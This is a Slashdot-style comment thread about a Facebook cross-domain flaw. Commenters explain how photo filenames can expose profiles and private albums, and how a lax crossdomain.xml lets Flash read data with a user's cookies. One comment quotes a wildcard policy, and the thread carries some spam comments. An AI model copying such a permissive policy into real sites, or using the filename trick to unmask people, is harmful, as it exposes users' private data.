I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997188)

What about the backdoor that lets you find someone's picture album and their profile if you have the filename of one of their pictures from the album (say, someone dragged the picture into a folder, and then e-mailed it or posted it on a message board, thinking that since they're not posting a link to the facebook photo they're anonymous)?

Will they ever fix that?

Re:I'm wondering... (0)

Anonymous Coward | more than 4 years ago | (#29997598)

That isn't really a back door, per se. It can reveal someone's profile ID number, but knowing that only allows you access to any parts of the person's profile that are publicly viewable. It isn't an ideal situation, but if you're foolish enough to post a photo on a message board somewhere without sanitizing the metadata (and in this case, the file name is a type of metadata), that is hardly Facebook's fault—no more than it would be Canon or Nokia's fault if someone posted a photo with his home's GPS coordinates in the metadata.

Re:I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997778)

It also allows you to see all the other photos in that album, even if the album isn't publicly accessible.

Re:I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997908)

Regarding sanitizing the metadata, it's not apparent from just glancing at the filename that it contains this information. You have to know, and most people don't.

It could be relatively easily fixed, too... just use a script to generate the data and pass it in the path name, not the filename. E.g. /image.php/123/456/789/arbitraryfilename.jpg. "arbitraryfilename" can be anything you want it to be, so long as image.php knows to ignore it.

Cross d'oh! man (0)

Anonymous Coward | more than 4 years ago | (#29997298)

The rise of the "cross d'oh! man" http://bit.ly/1x3krU (from http://twitter.com/vambenepe/status/5455193554)

Facebook Spam (1)

pipingguy (566974) | more than 4 years ago | (#29997558)

Yeah, I'm a lamer, I have a FaceBook account.

Am I the only one who's been getting a shitload of FaceBook spam recently?

Thank god (1)

OricAtmos48K (979353) | more than 4 years ago | (#29998634)

I am happy to hear that the patch is out in action otherwise WOULD YOU LIKE TO ENLARGE YOUR P**IS ?

have I understood correctly? (1)

dropadrop (1057046) | more than 4 years ago | (#29999168)

So did I get this correctly...

I have a crossdomain.xml file on my website a.com with a very lax policy (allow *). This means that pretty much any flash file I open from any other site can access a.com and see (or copy) data with my permissions? If I have auto-login enabled (as in the facebook example) it can log in with my cookies and collect the data without the site being open, and if my site does not feature auto login it can still access the data given I have an open session?

Facebook Chat (0)

Anonymous Coward | more than 4 years ago | (#30000146)

Has anyone here noticed a bug that allows you to see online friends on your iphone that aren't online on the computer? This bug persists with the same friends even after reboot of the ipod and computer.

Other sites (0)

Anonymous Coward | more than 4 years ago | (#30001070)

I'm not sure I totally understand the technical issues, but is Xanga doing this wrong? http://www.xanga.com/crossdomain.xml

<cross-domain-policy>
    <allow-http-request-headers-from domain="*" headers="*"/>
    <allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>

Premium White Pro (1)

ronnny (1672504) | more than 4 years ago | (#30003282)

Facebook is no comparison to myspace . Myspace is different zone of siti Premium White Pro [ezinearticles.com]